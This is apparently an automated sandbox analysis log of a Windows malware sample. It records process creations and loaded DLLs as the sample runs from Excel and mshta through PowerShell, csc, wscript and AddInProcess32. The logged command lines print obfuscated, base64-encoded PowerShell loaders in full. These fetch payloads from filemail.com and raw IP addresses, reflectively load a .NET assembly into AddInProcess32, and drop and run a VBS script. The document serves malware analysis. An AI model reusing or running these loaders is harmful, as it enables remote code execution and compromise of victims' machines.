Hh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6826.tmp" "c:\Users\user\AppData\Local\Temp\2ejdq4gg\CSC8D7D0D2F906B46909F7C7CB8135B630.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
